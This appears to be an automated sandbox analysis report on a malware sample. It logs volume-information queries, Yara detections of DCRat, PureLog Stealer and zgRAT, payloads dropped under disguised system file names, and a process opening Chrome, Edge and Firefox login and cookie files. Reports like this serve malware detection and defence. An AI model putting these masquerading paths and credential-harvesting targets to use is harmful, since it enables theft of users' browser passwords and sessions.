                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeQueries volume information: C:\Users\user\Desktop\Udzp7lL5ns.exe VolumeInformation
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeQueries volume information: C:\Users\user\Desktop\Udzp7lL5ns.exe VolumeInformation
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeQueries volume information: C:\Program Files (x86)\Windows Mail\Memory Compression.exe VolumeInformation
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeQueries volume information: C:\Program Files (x86)\Windows Mail\Memory Compression.exe VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeQueries volume information: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe VolumeInformation
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Stealing of Sensitive Information

                            barindex
                            Yara detected DCRat
                            Source: Yara matchFile source: 00000000.00000002.2152938013.0000000012956000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: Udzp7lL5ns.exe PID: 348, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Memory Compression.exe PID: 8040, type: MEMORYSTR
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: Udzp7lL5ns.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.Udzp7lL5ns.exe.2b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.2053026799.00000000002B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe, type: DROPPED
                            Yara detected zgRAT
                            Source: Yara matchFile source: Udzp7lL5ns.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.Udzp7lL5ns.exe.2b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe, type: DROPPED
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
